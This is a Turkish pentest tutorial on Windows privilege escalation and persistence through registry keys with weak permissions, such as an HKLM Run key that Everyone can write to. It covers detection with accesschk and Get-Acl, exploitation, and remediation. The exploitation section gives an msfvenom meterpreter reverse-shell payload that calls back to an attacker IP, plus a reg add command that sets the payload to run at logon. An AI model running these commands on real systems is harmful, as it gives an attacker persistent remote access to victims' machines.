Özet

Windows sistemlerde yanlış yapılandırılmış kayıt defteri kayıtları bulunabilir. Standart kurulumlarda sıklıkla karşılaşılan bir durum olmasa da kullanıcılar bazen izinleri yanlış yapılandırarak, kötü niyetli kişilere yeni ayrıcalıklar elde etmek için bir yol açmış olabilirler. Bazen bu izinler kullanılarak yeni ayrıcalıklar elde edilebilir.

Detay

Özetle bazı anahtarlar yönetici olmayan kullanıcılar tarafından değiştirilebilir olduğunda bu anahtarlar manipüle edilerek sistemde yetki yükseltilebilir ve sistemde kalıcılık sağlanabilir.

Örnek olarak AutoRun özelliğini aktifleştiren anahtarlar verilebilir. Aşağıda sistemin her açılışında otomatik olarak başlatacağı uygulamaların belirlendiği kayıt bölümü olan Run kaydının herkes tarafından düzenlenebildiği gösterilmiştir.

Bulunması

Yanlış yapılandırılmış kayıt defteri izinlerini otomatik olarak bulmak için DazzleUp kullanılabilir. DazzleUp’ın yanlış yapılandırma için oluşturduğu çıktının ekran görüntüsü aşağıda verilmiştir.

Yanlış yapılandırılmış kayıt defteri iznini bulmak için sysinternal araçlarından olan accesschk.exe kullanılabilir. HKLM altında yanlış yapılandırılmış bir kayıt bulmak için;

Accesschk64.exe Everyone -kvuqsw HKLM\

komutunu kullanarak Everyone’ın değişiklik yapma iznine sahip olduğu tüm kayıtları listeleyebiliriz. Aşağıda yanlış yapılandırılmış kayıt gösterilmiştir.

Yanlış yapılandırılmış kaydı detaylı incelemek için;

Get-Acl -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Format-List

komutu kullanılabilir. Ekran görüntüsünden görüldüğü üzere ilgili kayıt NT AUTHORITY\SYSTEM grubuna dahil olup Everyone tarafından tam erişime sahip.

İstismar Edilmesi

Zararlı yazılım üretilerek sisteme yüklenecektir. Zararlının üretildiğine dair ekran görüntüsü aşağıda verilmiştir.

msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.182 LPORT=445 -f exe -o cmd.exe

İlgili dosyanın hedef makineye daha önceden elde edilmiş bir oturum üzerinden yüklenmesine dair ekran görüntüsü aşağıda verilmiştir.

Bu kayıt bölümünde herkes değişiklik yapabildiği için;

Reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v Insecure /d C:\Users\test\Desktop\cmd.exe

komutunu girerek zararlı yazılımı her oturum açılışında çalıştırılacak şekilde ayarlamış bulunuyoruz. Anahtara zararlı yazılımın tam yolunun verildiğine dair ekran görüntüsü aşağıda verilmiştir.

Sonraki oturum açılışında, oturum açan kullanıcı ayrıcalıklarında uzaktan erişim elde edilecektir. Administrator kullanıcısı oturum açtığında elde edilen uzaktan erişim oturumu aşağıda ki ekran görüntüsünde gösterilmiştir.

Çözüm

Hatalı yapılandırmayı gidermek için, yanlış yapılandırılmış kaydın izinler bölümünde düzenleme yapılmalıdır. İzinlerin nereden değiştirileceği aşağıda ki ekran görüntülerinde gösterilmiştir.

Yanlış yapılandırmanın düzeldiğine dair ekran görüntüsü aşağıda verilmitir.

Kaynakça

  • https://en.wikipedia.org/wiki/Windows_Registry
  • https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
  • https://github.com/hlldz/dazzleUP
  • https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk